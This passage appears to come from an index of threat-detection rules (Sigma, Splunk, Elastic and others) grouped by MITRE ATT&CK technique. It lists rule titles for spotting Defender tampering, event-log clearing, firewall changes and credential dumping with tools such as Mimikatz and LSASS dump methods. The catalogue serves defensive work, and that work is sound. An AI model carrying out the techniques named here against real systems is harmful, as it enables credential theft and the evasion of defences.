- Sigma Service Registry Key Deleted Via Reg.EXE test
- Sigma Service Startup Type Change Via Wmic.EXE experimental
- Sigma Service StartupType Change Via PowerShell Set-Service test
- Sigma Service StartupType Change Via Sc.EXE test
- Sigma Suspicious Application Allowed Through Exploit Guard test
- Sigma Suspicious Eventlog Clear test
- Sigma Suspicious Eventlog Clearing or Configuration Change Activity stable
- Sigma Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location experimental
- Sigma Suspicious Path In Keyboard Layout IME File Registry Value test
- Sigma Suspicious Process Access of MsMpEng by WerFaultSecure - EDR-Freeze experimental
- Sigma Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs experimental
- Sigma Suspicious PROCEXP152.sys File Created In TMP test
- Sigma Suspicious Service Installed test
- Sigma Suspicious Svchost Process Access test
- Sigma Suspicious Uninstall of Windows Defender Feature via PowerShell experimental
- Splunk Suspicious wevtutil Usage production
- Sigma Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE test
- Sigma Suspicious Windows Defender Registry Key Tampering Via Reg.EXE test
- Sigma Suspicious Windows Service Tampering test
- Sigma Suspicious Windows Trace ETW Session Tamper Via Logman.EXE test
- Sigma Sysinternals PsSuspend Suspicious Execution test
- Sigma Sysmon Application Crashed test
- Sigma Sysmon Configuration Update test
- Sigma Sysmon Driver Altitude Change test
- Sigma Sysmon Driver Unloaded Via Fltmc.EXE test
- Sigma Tamper Windows Defender - PSClassic test
- Sigma Tamper Windows Defender - ScriptBlockLogging test
- Sigma Tamper Windows Defender Remove-MpPreference test
- Sigma Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging test
- Sigma Tamper With Sophos AV Registry Keys test
- Sigma Taskkill Symantec Endpoint Protection test
- Sigma Terminate Linux Process Via Kill test
- Sigma Uncommon Extension In Keyboard Layout IME File Registry Value test
- Sigma Uninstall Crowdstrike Falcon Sensor test
- Sigma Uninstall Sysinternals Sysmon test
- Splunk Unload Sysmon Filter Driver production
- Splunk Unloading AMSI via Reflection production
- Sigma Vulnerable Driver Blocklist Registry Tampering Via CommandLine experimental
- Sigma WDAC Policy File Creation In CodeIntegrity Folder experimental
- Sigma Weak Encryption Enabled and Kerberoast test
- Sigma WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze experimental
- Sigma WFP Filter Added via Registry experimental
- Sigma Win Defender Restored Quarantine File test
- Splunk Windows AD Domain Controller Audit Policy Disabled production
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Sigma Windows AMSI Related Registry Tampering Via CommandLine experimental
- Splunk Windows Attempt To Stop Security Service production
- Splunk Windows Audit Policy Auditing Option Disabled via Auditpol production
- Splunk Windows Audit Policy Cleared via Auditpol production
- Splunk Windows Audit Policy Disabled via Auditpol production
- Splunk Windows Audit Policy Disabled via Legacy Auditpol production
- Splunk Windows Audit Policy Excluded Category via Auditpol production
- Splunk Windows Audit Policy Restored via Auditpol production
- Splunk Windows Audit Policy Security Descriptor Tampering via Auditpol production
- Splunk Windows Cisco Secure Endpoint Stop Immunet Service Via Sfc production
- Splunk Windows Cisco Secure Endpoint Unblock File Via Sfc production
- Splunk Windows Cisco Secure Endpoint Uninstall Immunet Service Via Sfc production
- Sigma Windows Credential Guard Disabled - Registry experimental
- Sigma Windows Credential Guard Registry Tampering Via CommandLine experimental
- Sigma Windows Credential Guard Related Registry Value Deleted - Registry experimental
- Splunk Windows CrowdStrike Agent Registry Key Removal production
- Splunk Windows Defender ASR or Threat Configuration Tamper production
- Sigma Windows Defender Configuration Changes stable
- Sigma Windows Defender Context Menu Removed experimental
- Sigma Windows Defender Definition Files Removed test
- Sigma Windows Defender Exclusion List Modified test
- Splunk Windows Defender Exclusion Registry Entry production
- Sigma Windows Defender Exclusion Registry Key - Write Access Requested test
- Sigma Windows Defender Exclusions Added stable
- Sigma Windows Defender Exclusions Added - PowerShell test
- Sigma Windows Defender Exclusions Added - Registry test
- Sigma Windows Defender Exploit Guard Tamper test
- Sigma Windows Defender Grace Period Expired stable
- Sigma Windows Defender Malware And PUA Scanning Disabled stable
- Sigma Windows Defender Real-time Protection Disabled stable
- Sigma Windows Defender Real-Time Protection Failure/Restart stable
- Sigma Windows Defender Service Disabled - Registry test
- Sigma Windows Defender Submit Sample Feature Disabled stable
- Sigma Windows Defender Threat Detection Service Disabled stable
- Sigma Windows Defender Threat Severity Default Action Modified experimental
- Sigma Windows Defender Virus Scanning Feature Disabled stable
- Splunk Windows Disable or Modify Tools Via Taskkill production
- Splunk Windows Disable or Stop Browser Process production
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Splunk Windows DisableAntiSpyware Registry production
- Splunk Windows DISM Remove Defender production
- Splunk Windows EDRSilencer Execution production
- Sigma Windows Event Auditing Disabled test
- Splunk Windows Event For Service Disabled production
- Splunk Windows Event Log Cleared production
- Splunk Windows Event Logging Service Has Shutdown production
- Sigma Windows EventLog Autologger Session Registry Modification Via CommandLine experimental
- Splunk Windows Eventlog Cleared Via Wevtutil production
- Splunk Windows Excessive Disabled Services Event production
- Sigma Windows Filtering Platform Blocked Connection From EDR Agent Binary test
- Splunk Windows Filtering Platform Policy Added to Block EDR Process production
- Sigma Windows Firewall Disabled via PowerShell test
- Splunk Windows Global Object Access Audit List Cleared Via Auditpol production
- Sigma Windows Hypervisor Enforced Code Integrity Disabled test
- Splunk Windows Impair Defense Add Xml Applocker Rules production
- Splunk Windows Impair Defense Change Win Defender Health Check Intervals production
- Splunk Windows Impair Defense Change Win Defender Quick Scan Interval production
- Splunk Windows Impair Defense Change Win Defender Throttle Rate production
- Splunk Windows Impair Defense Change Win Defender Tracing Level production
- Splunk Windows Impair Defense Configure App Install Control production
- Splunk Windows Impair Defense Define Win Defender Threat Action production
- Splunk Windows Impair Defense Delete Win Defender Context Menu production
- Splunk Windows Impair Defense Delete Win Defender Profile Registry production
- Splunk Windows Impair Defense Deny Security Software With Applocker production
- Splunk Windows Impair Defense Disable Controlled Folder Access production
- Splunk Windows Impair Defense Disable Defender Firewall And Network production
- Splunk Windows Impair Defense Disable Defender Protocol Recognition production
- Splunk Windows Impair Defense Disable PUA Protection production
- Splunk Windows Impair Defense Disable Realtime Signature Delivery production
- Splunk Windows Impair Defense Disable Web Evaluation production
- Splunk Windows Impair Defense Disable Win Defender App Guard production
- Splunk Windows Impair Defense Disable Win Defender Compute File Hashes production
- Splunk Windows Impair Defense Disable Win Defender Gen reports production
- Splunk Windows Impair Defense Disable Win Defender Network Protection production
- Splunk Windows Impair Defense Disable Win Defender Report Infection production
- Splunk Windows Impair Defense Disable Win Defender Scan On Update production
- Splunk Windows Impair Defense Disable Win Defender Signature Retirement production
- Splunk Windows Impair Defense Overide Win Defender Phishing Filter production
- Splunk Windows Impair Defense Override SmartScreen Prompt production
- Splunk Windows Impair Defense Set Win Defender Smart Screen Level To Warn production
- Splunk Windows Impair Defenses Disable Auto Logger Session production
- Splunk Windows Impair Defenses Disable HVCI production
- Splunk Windows Impair Defenses Disable Win Defender Auto Logging production
- Splunk Windows Important Audit Policy Disabled production
- Splunk Windows Increase in Group or Object Modification Activity production
- Splunk Windows Increase in User Modification Activity production
- Splunk Windows MpCmdRun RemoveDefinitions Execution production
- Splunk Windows New Custom Security Descriptor Set On EventLog Channel production
- Splunk Windows New EventLog ChannelAccess Registry Value Set production
- Splunk Windows Outlook Dialogs Disabled from Unusual Process production
- Splunk Windows PowerShell Disable HTTP Logging production
- Splunk Windows Powershell Import Applocker Policy production
- Splunk Windows Raccine Scheduled Task Deletion production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Registry Dotnet ETW Disabled Via ENV Variable production
- Splunk Windows Terminating Lsass Process production
- Sigma Windows Vulnerable Driver Blocklist Disabled experimental
- Splunk Wmic NonInteractive App Uninstallation production
- Sigma Write Protect For Storage Disabled test
Disable or Modify Tools: Disable or Modify Windows Event Log T1685.001 40 rules
- Sigma Audit Policy Tampering Via Auditpol test
- Sigma Audit Policy Tampering Via NT Resource Kit Auditpol test
- Sigma Change Winevt Channel Access Permission Via Registry test
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Sigma Disable Windows Event Logging Via Registry test
- Sigma Disable Windows IIS HTTP Logging test
- Sigma ETW Logging/Processing Option Disabled On IIS Server test
- Sigma EVTX Created In Uncommon Location test
- Sigma Filter Driver Unloaded Via Fltmc.EXE test
- Sigma Forest Blizzard APT - File Creation Activity test
- Sigma Forest Blizzard APT - JavaScript Constrained File Creation test
- Sigma HackTool - SharpEvtMute DLL Load test
- Sigma HackTool - SharpEvtMute Execution test
- Sigma HackTool - SysmonEnte Execution test
- Sigma HTTP Logging Disabled On IIS Server test
- Sigma Important Windows Event Auditing Disabled test
- Sigma New Module Module Added To IIS Server test
- Sigma Potential AutoLogger Sessions Tampering test
- Sigma Potential EventLog File Location Tampering test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Previously Installed IIS Module Was Removed test
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Process experimental
- Sigma Security Event Logging Disabled via MiniNt Registry Key - Registry Set experimental
- Sigma Suspicious Eventlog Clearing or Configuration Change Activity stable
- Sigma Suspicious Svchost Process Access test
- Sigma Sysmon Driver Unloaded Via Fltmc.EXE test
- Splunk Windows Audit Policy Auditing Option Disabled via Auditpol production
- Splunk Windows Audit Policy Cleared via Auditpol production
- Splunk Windows Audit Policy Disabled via Auditpol production
- Splunk Windows Audit Policy Disabled via Legacy Auditpol production
- Splunk Windows Audit Policy Excluded Category via Auditpol production
- Splunk Windows Audit Policy Restored via Auditpol production
- Splunk Windows Audit Policy Security Descriptor Tampering via Auditpol production
- Splunk Windows Disable Windows Event Logging Disable HTTP Logging production
- Sigma Windows Event Auditing Disabled test
- Sigma Windows EventLog Autologger Session Registry Modification Via CommandLine experimental
- Splunk Windows Global Object Access Audit List Cleared Via Auditpol production
- Splunk Windows New Custom Security Descriptor Set On EventLog Channel production
- Splunk Windows New EventLog ChannelAccess Registry Value Set production
- Splunk Windows PowerShell Disable HTTP Logging production
Disable or Modify Tools: Clear Windows Event Logs T1685.005 12 rules
- Splunk Disable Logs Using WevtUtil production
- Sigma Eventlog Cleared test
- Sigma Important Windows Eventlog Cleared test
- Sigma NotPetya Ransomware Activity test
- Sigma Security Eventlog Cleared test
- Sigma Suspicious Eventlog Clear test
- Sigma Suspicious Eventlog Clearing or Configuration Change Activity stable
- Splunk Suspicious wevtutil Usage production
- Sigma Suspicious Windows Trace ETW Session Tamper Via Logman.EXE test
- Splunk Windows Event Log Cleared production
- Splunk Windows Event Logging Service Has Shutdown production
- Splunk Windows Eventlog Cleared Via Wevtutil production
Disable or Modify System Firewall T1686 28 rules
- Sigma A Rule Has Been Deleted From The Windows Firewall Exception List test
- Sigma All Rules Have Been Deleted From The Windows Firewall Configuration test
- Splunk Allow File And Printing Sharing In Firewall production
- Splunk Allow Network Discovery In Firewall production
- Sigma Disable Microsoft Defender Firewall via Registry test
- Sigma Disable Windows Firewall by Registry test
- Splunk Firewall Allowed Program Enable production
- Sigma Firewall Disabled via Netsh.EXE test
- Sigma Firewall Rule Deleted Via Netsh.EXE test
- Sigma Firewall Rule Modified In The Windows Firewall Exception List test
- Sigma Netsh Allow Group Policy on Microsoft Defender Firewall test
- Sigma New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application test
- Sigma New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE test
- Sigma New Firewall Rule Added Via Netsh.EXE test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock test
- Sigma RDP Connection Allowed Via Netsh.EXE test
- Sigma Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE test
- Sigma The Windows Defender Firewall Service Failed To Load Group Policy test
- Sigma Uncommon New Firewall Rule Added In Windows Firewall Exception List test
- Sigma Windows Defender Firewall Has Been Reset To Its Default Configuration test
- Splunk Windows Delete or Modify System Firewall production
- Sigma Windows Firewall Profile Disabled test
- Splunk Windows Firewall Rule Added production
- Splunk Windows Firewall Rule Deletion production
- Splunk Windows Firewall Rule Modification production
- Sigma Windows Firewall Settings Have Been Changed test
- Splunk Windows Modify System Firewall with Notable Process Path production
Disable or Modify System Firewall: Cloud Firewall T1686.001 2 rules
- Splunk Allow File And Printing Sharing In Firewall production
- Splunk Allow Network Discovery In Firewall production
Disable or Modify System Firewall: Windows Host Firewall T1686.003 20 rules
- Sigma A Rule Has Been Deleted From The Windows Firewall Exception List test
- Sigma All Rules Have Been Deleted From The Windows Firewall Configuration test
- Sigma Disable Microsoft Defender Firewall via Registry test
- Sigma Disable Windows Firewall by Registry test
- Sigma Firewall Disabled via Netsh.EXE test
- Sigma Firewall Rule Deleted Via Netsh.EXE test
- Sigma Firewall Rule Modified In The Windows Firewall Exception List test
- Sigma Netsh Allow Group Policy on Microsoft Defender Firewall test
- Sigma New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application test
- Sigma New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE test
- Sigma New Firewall Rule Added Via Netsh.EXE test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet test
- Sigma New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock test
- Sigma RDP Connection Allowed Via Netsh.EXE test
- Sigma Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE test
- Sigma The Windows Defender Firewall Service Failed To Load Group Policy test
- Sigma Uncommon New Firewall Rule Added In Windows Firewall Exception List test
- Sigma Windows Defender Firewall Has Been Reset To Its Default Configuration test
- Sigma Windows Firewall Profile Disabled test
- Sigma Windows Firewall Settings Have Been Changed test
Safe Mode Boot T1688 1 rule
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
Downgrade Attack T1689 2 rules
- Sigma LSA PPL Protection Setting Modification via CommandLine test
- Splunk Windows Downdate Registry Activity production
Credential Access
OS Credential Dumping T1003 313 rules
- Splunk Access LSASS Memory for Dump Creation production
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Active Directory Replication from Non Machine Account test
- Splunk ADExplorer Execution (Sysmon)
- Splunk ADExplorer Execution (Windows Event Log)
- Splunk ADExplorer Snapshot Creation (Sysmon)
- Splunk ADExplorer Snapshot Creation (Windows Event Log)
- Sigma APT31 Judgement Panda Activity test
- Splunk Attacker Tools On Endpoint production
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Splunk Browser Credential File Accessed - Windows (Windows Event Log)
- Sigma Capture Credentials with Rpcping.exe test
- Splunk Command Line lsass request (PowerShell)
- Splunk Command Line lsass request (Sysmon)
- Splunk Command Line lsass request (Windows Event Log)
- Splunk Common LSASS Memory Dump Behavior (Windows Event Log)
- Splunk comsvcs.dll Lsass Memory Dump (Sysmon)
- Splunk comsvcs.dll Lsass Memory Dump (Windows Event Log)
- Sigma Copying Sensitive Files with Credential Data test
- Sigma Crash Dump Created By Operating System experimental
- Splunk Create Remote Thread into LSASS production
- Sigma Create Volume Shadow Copy with Powershell test
- Sigma CreateDump Process Dump test
- YARA-L CreateDump Process Dump
- Splunk Creation of lsass Dump with Taskmgr production
- Splunk Creation of Shadow Copy production
- Splunk Creation of Shadow Copy with wmic and powershell production
- Sigma Cred Dump Tools Dropped Files test
- YARA-L Cred Dump Tools Dropped Files
- Elastic Credential Acquisition via Registry Hive Dumping production
- Sigma Credential Dumping Activity By Python Based Tool stable
- Sigma Credential Dumping Attempt Via WerFault test
- YARA-L Credential Dumping Attempt Via WerFault
- Kusto Credential Dumping Tools - File Artifacts available
- Kusto Credential Dumping Tools - Service Installation available
- Sigma Credential Dumping Tools Service Execution - Security test
- Sigma Credential Dumping Tools Service Execution - System test
- Splunk Credential Dumping via Copy Command from Shadow Copy production
- Splunk Credential Dumping via Symlink to Shadow Copy production
- Sigma Critical Hive In Suspicious Location Access Bits Cleared test
- Sigma Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process test
- Splunk Detect Copy of ShadowCopy with Script Block Logging production
- Splunk Detect Credential Dumping through LSASS access production
- Splunk Detect Mimikatz With PowerShell Script Block Logging production
- Kusto Dev-0228 File Path Hashes November 2021
- Kusto Dev-0228 File Path Hashes November 2021 (ASIM Version)
- Elastic Disabling Lsa Protection via Registry Modification production
- Sigma Diskshadow command abuse to expose VSS backup experimental
- Kusto DopplePaymer Procdump available
- Sigma DPAPI Domain Backup Key Extraction test
- Sigma DPAPI Domain Master Key Backup Attempt test
- Splunk Dump File Identified (PowerShell)
- Splunk Dump File Identified (Sysmon)
- Splunk Dump File Identified (Windows Event Log)
- Splunk Dump LSASS via comsvcs DLL production
- Splunk Dump LSASS via procdump production
- Kusto Dumping LSASS Process Into a File available
- Sigma Dumping of Sensitive Hives Via Reg.EXE test
- Sigma Dumping Process via Sqldumper.exe test
- Sigma DumpMinitool Execution test
- Splunk Enable WDigest UseLogonCredential Registry production
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Sigma Esentutl Gather Credentials test
- Splunk Esentutl SAM Copy production
- Sigma Esentutl Volume Shadow Copy Service Keys test
- Splunk Excessive DRSGetNCChanges Requests (Windows Event Log)
- Sigma Exchange group membership change to perform DCsync attack experimental
- Sigma File Access Of Signal Desktop Sensitive Data experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Sigma Group Managed Service Accounts password dump - GoldenGMSA experimental
- Sigma HackTool - CrackMapExec File Indicators test
- Sigma HackTool - CrackMapExec Process Patterns test
- Sigma HackTool - CreateMiniDump Execution test
- Sigma HackTool - Credential Dumping Tools Named Pipe Created test
- Sigma HackTool - Doppelanger LSASS Dumper Execution experimental
- Sigma HackTool - Dumpert Process Dumper Default File test
- YARA-L HackTool - Dumpert Process Dumper Default File
- Sigma HackTool - Dumpert Process Dumper Execution test
- YARA-L HackTool - Dumpert Process Dumper Execution
- Sigma HackTool - Generic Process Access test
- YARA-L HackTool - Generic Process Access
- Sigma HackTool - HandleKatz Duplicating LSASS Handle test
- Sigma HackTool - HandleKatz LSASS Dumper Execution test
- Sigma HackTool - Impacket File Indicators experimental
- Sigma HackTool - Inveigh Execution test
- Sigma HackTool - Mimikatz Execution test
- YARA-L HackTool - Mimikatz Execution
- Sigma HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump test
- Sigma HackTool - Pypykatz Credentials Dumping Activity test
- Sigma HackTool - Quarks PwDump Execution test
- Sigma HackTool - QuarksPwDump Dump File test
- Sigma HackTool - Rubeus Execution stable
- Sigma HackTool - Rubeus Execution - ScriptBlock test
- Sigma HackTool - SafetyKatz Dump Indicator test
- Sigma HackTool - SafetyKatz Execution test
- Sigma HackTool - Windows Credential Editor (WCE) Execution test
- Sigma HackTool - WSASS Execution experimental
- Sigma HackTool - XORDump Execution test
- Sigma Hacktool Execution - Imphash test
- Sigma Hacktool Execution - PE Metadata test
- Sigma IFM creation detected from commandline (installation from media) experimental
- Sigma IFM detected - ESENT (installation from media) experimental
- Sigma IIS Application Pool credential dumping experimental
- Sigma Interesting Service Enumeration Via Sc.EXE test
- Sigma Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) test
- Sigma Kerberos key list attack for credential dumping experimental
- Elastic Kirbi File Creation production
- Kusto LaZagne Credential Theft available
- Sigma Live Memory Dump Using Powershell test
- Sigma Loaded Module Enumeration Via Tasklist.EXE test
- Sigma LSASS Access Detected via Attack Surface Reduction test
- Sigma LSASS Access From Non System Account test
- Sigma LSASS Access From Potentially White-Listed Processes test
- Sigma LSASS Access From Program In Potentially Suspicious Folder test
- Sigma LSASS credential dump with LSASSY (admin share) experimental
- Sigma LSASS credential dump with LSASSY (kernel access) experimental
- Sigma LSASS credential dump with LSASSY (PowerShell) experimental
- Sigma LSASS credential dump with LSASSY (process) experimental
- Kusto LSASS Credential Dumping with Procdump available
- Sigma LSASS Dump Keyword In CommandLine test
- YARA-L LSASS Dump Keyword In CommandLine
- Sigma LSASS dump via process access experimental
- Kusto LSASS Dumping using Debug Privileges
- Sigma Lsass Full Dump Request Via DumpType Registry Settings test
- Splunk LSASS Handle request (Windows Event Log)
- Sigma LSASS Memory Access by Tool With Dump Keyword In Name test
- YARA-L LSASS Memory Access by Tool With Dump Keyword In Name
- Elastic LSASS Memory Dump Handle Access production
- Sigma Lsass Memory Dump via Comsvcs DLL test
- YARA-L Lsass Memory Dump via Comsvcs DLL
- Sigma LSASS Process Crashed - Application experimental
- Sigma LSASS Process Dump Artefact In CrashDumps Folder test
- Sigma LSASS process dump by a non system account experimental
- Sigma LSASS Process Memory Dump Creation Via Taskmgr.EXE test
- YARA-L LSASS Process Memory Dump Creation Via Taskmgr.exe
- Sigma LSASS Process Memory Dump Files test
- YARA-L LSASS Process Memory Dump Files
- Elastic Memory Dump File with Unusual Extension production
- Sigma Microsoft IIS Connection Strings Decryption test
- Elastic Microsoft IIS Connection Strings Decryption production
- Sigma Microsoft IIS Service Account Password Dumped test
- Elastic Microsoft IIS Service Account Password Dumped production
- Splunk Mimikatz (Sysmon)
- Splunk Mimikatz (Windows Event Log)
- Sigma Mimikatz DC Sync test
- Splunk Mimikatz Execution (Windows Event Log)
- Sigma Mimikatz malicious Security package (SSP) exfiltrates cleartext passwords in file experimental
- YARA-L MITRE ATT&CK T1003 RW Mimikatz
- YARA-L MITRE ATT&CK T1003.003 RW Utilities Associated With Ntds.dit
- YARA-L MITRE ATT&CK T1003.003 WMIC Ntds.dit CISA Report
- Elastic Modification of WDigest Security Provider production
- Splunk MultiDump.exe Execution (Sysmon)
- Splunk MultiDump.exe Execution (Windows Event Log)
- Elastic Multiple Vault Web Credentials Read production
- Sigma NetSYnc attack experimental
- Sigma New Generic Credentials Added Via Cmdkey.EXE test
- Kusto Non Domain Controller Active Directory Replication available
- Sigma NotPetya Ransomware Activity test
- Elastic NTDS Dump via Wbadmin production
- Sigma NTDS Exfiltration Filename Patterns test
- Elastic NTDS or SAM Database File Copied production
- Splunk ntds.dit Access from Unexpected Location (Sysmon)
- Splunk ntds.dit Access from Unexpected Location (Windows Event Log)
- Splunk ntds.dit Command Line (PowerShell)
- Splunk ntds.dit Command Line (Sysmon)
- Splunk ntds.dit Command Line (Windows Event Log)
- Sigma NTDS.DIT Created test
- Sigma NTDS.DIT Creation By Uncommon Parent Process test
- Sigma NTDS.DIT Creation By Uncommon Process test
- Sigma Ntdsutil Abuse test
- Splunk Ntdsutil Export NTDS production
- Splunk NTDSUtil.exe execution (Sysmon)
- Splunk NTDSUtil.exe execution (Windows Event Log)
- Sigma Password Dumper Activity on LSASS test
- Sigma Password Dumper Remote Thread in LSASS stable
- Splunk PetitPotam Suspicious Kerberos TGT Request production
- Splunk Possible Credential Dumping via Windows Network Providers (PowerShell)
- Splunk Possible Credential Dumping via Windows Network Providers (Windows Event Log)
- Sigma Possible Impacket SecretDump Remote Activity test
- Elastic Potential Active Directory Replication Account Backdoor production
- Sigma Potential Adplus.EXE Abuse test
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Credential Access via DuplicateHandle in LSASS production
- Elastic Potential Credential Access via LSASS Memory Dump production
- Elastic Potential Credential Access via Memory Dump File Creation production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Credential Dumping Activity Via LSASS test
- YARA-L Potential Credential Dumping Activity Via LSASS
- Sigma Potential Credential Dumping Attempt Using New NetworkProvider - CLI test
- Sigma Potential Credential Dumping Attempt Using New NetworkProvider - REG test
- Sigma Potential Credential Dumping Attempt Via PowerShell test
- Sigma Potential Credential Dumping Attempt Via PowerShell Remote Thread test
- Splunk Potential Credential Dumping of LSASS (Windows Event Log)
- Sigma Potential Credential Dumping Via LSASS Process Clone test
- Sigma Potential Credential Dumping Via LSASS SilentProcessExit Technique test
- YARA-L Potential Credential Dumping Via LSASS SilentProcessExit Technique
- Sigma Potential Credential Dumping Via WER test
- Splunk Potential DCSync (Windows Event Log)
- Sigma Potential Exploitation of CVE-2025-5054 or CVE-2025-4598 experimental
- Sigma Potential Invoke-Mimikatz PowerShell Script test
- Elastic Potential LSASS Clone Creation via PssCaptureSnapShot production
- Elastic Potential LSASS Memory Dump via PssCaptureSnapShot production
- Sigma Potential LSASS Process Dump Via Procdump stable
- YARA-L potential lsass process dump via procdump
- Splunk Potential nanodump execution (Windows Event Log)
- Sigma Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE test
- Elastic Potential Remote Credential Access via Registry production
- Sigma Potential Russian APT Credential Theft Activity stable
- Sigma Potential SAM Database Dump test
- Sigma Potential SAM database user credentials dumped with DCshadow experimental
- Sigma Potential SysInternals ProcDump Evasion test
- Elastic Potential Veeam Credential Access Command production
- Sigma Potential Windows Defender AV Bypass Via Dump64.EXE Rename test
- Sigma Potentially Suspicious AccessMask Requested From LSASS test
- Sigma Potentially Suspicious GrantedAccess Flags On LSASS test
- Sigma Potentially Suspicious ODBC Driver Registered test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Get-Process LSASS in ScriptBlock test
- Sigma PowerShell SAM Copy test
- Sigma PPL Tampering Via WerFaultSecure experimental
- Splunk ProcDump Credential Harvest (Sysmon)
- Splunk ProcDump Credential Harvest (Windows Event Log)
- Sigma Procdump Execution test
- Sigma Process Access via TrolleyExpress Exclusion test
- Sigma Process Memory Dump Via Comsvcs.DLL test
- YARA-L Process Memory Dump Via Comsvcs.DLL
- Sigma Process Memory Dump via RdrLeakDiag.EXE test
- YARA-L Process Memory Dump via RdrLeakDiag.exe
- Kusto PRT Credential Stealing
- Sigma PUA - DIT Snapshot Viewer test
- Sigma PUA - Memory Dump Mount Via MemProcFS experimental
- Splunk pypykatz commands (Windows Event Log)
- Splunk RdrLeakDiag.exe Memory Dump (PowerShell)
- Splunk RdrLeakDiag.exe Memory Dump (Sysmon)
- Splunk RdrLeakDiag.exe Memory Dump (Windows Event Log)
- Sigma Remote LSASS Process Access Through Windows Remote Management stable
- Sigma Renamed CreateDump Utility Execution test
- YARA-L Renamed CreateDump Utility Execution
- Sigma Replication privileges accessed to perform DCSync attack experimental
- Splunk SAM Database File Access Attempt production
- Sigma SAM database user credentials dump with Mimikatz experimental
- Splunk SAM, System, Security Files Accessed (Windows Event Log)
- Elastic Searching for Saved Credentials via VaultCmd production
- Sigma Secretdump password dumping via SMB admin share experimental
- Splunk SecretDumps Offline NTDS Dumping Tool production
- Splunk SecretsDump Credential Harvest (Windows Event Log)
- Sigma Sensitive File Dump Via Print.EXE test
- Sigma Sensitive File Dump Via Wbadmin.EXE test
- Sigma Sensitive File Recovery From Backup Via Wbadmin.EXE test
- Sigma Shadow Copies Creation Using Operating Systems Utilities test
- Splunk Shadow Copy Created (Windows Event Log)
- Sigma Suspicious DumpMinitool Execution test
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Sigma Suspicious Get-ADDBAccount Usage test
- Sigma Suspicious Get-ADReplAccount test
- Sigma Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location experimental
- Sigma Suspicious LSASS Access Via MalSecLogon test
- Elastic Suspicious LSASS Access via MalSecLogon production
- Elastic Suspicious Lsass Process Access production
- Elastic Suspicious Module Loaded by LSASS production
- Splunk Suspicious ntds.dit Commands (PowerShell)
- Splunk Suspicious ntds.dit Commands (Sysmon)
- Splunk Suspicious ntds.dit Commands (Windows Event Log)
- Sigma Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs experimental
- Sigma Suspicious Process Patterns NTDS.DIT Exfil test
- Elastic Suspicious Remote Registry Access via SeBackupPrivilege production
- Sigma Suspicious Renamed Comsvcs DLL Loaded By Rundll32 test
- Sigma Suspicious SYSTEM User Process Creation test
- Sigma Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded test
- Sigma Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) test
- Elastic Symbolic Link to Shadow Copy Created production
- Sigma Task Manager access indicator for potential LSASS dump experimental
- Splunk Task Manager lsass Dump (Windows Event Log)
- Sigma Task Manager used for LSASS dump (kernel) experimental
- Sigma Time Travel Debugging Utility Usage test
- Sigma Time Travel Debugging Utility Usage - Image test
- Sigma Transferring Files with Credential Data via Network Shares test
- Sigma Uncommon GrantedAccess Flags On LSASS test
- Sigma Unsigned Image Loaded Into LSASS Process test
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
- Elastic Veeam Backup Library Loaded by Unusual Process production
- Sigma Volume Shadow Copy Mount test
- Sigma VolumeShadowCopy Symlink Creation Via Mklink stable
- Sigma VSSAudit Security Event Source Registration test
- Sigma WCE wceaux.dll Access test
- Sigma Wdigest authentication enabled (Reg via command) experimental
- Sigma Wdigest authentication enabled (registry) experimental
- Kusto WDigest downgrade attack available
- Splunk WDigest Forced Credential Caching (PowerShell)
- Splunk WDigest Forced Credential Caching (Sysmon)
- Splunk WDigest Forced Credential Caching (Windows Event Log)
- Sigma WerFault LSASS Process Memory Dump test
- Splunk Windows AD Replication Request Initiated by User Account production
- Splunk Windows AD Replication Request Initiated from Unsanctioned Location production
- Splunk Windows Cached Domain Credentials Reg Query production
- Splunk Windows Credential Dumping LSASS Memory Createdump production
- Sigma Windows Credential Editor Registry test
- Splunk Windows Hunting System Account Targeting Lsass production
- Splunk Windows LAPS Password Gathering Via PowerShell Script production
- Splunk Windows LSA Secrets NoLMhash Registry production
- Splunk Windows Mimikatz Binary Execution production
- Splunk Windows Non-System Account Targeting Lsass production
- Splunk Windows Possible Credential Dumping production
- Splunk Windows Rapid Authentication On Multiple Hosts production
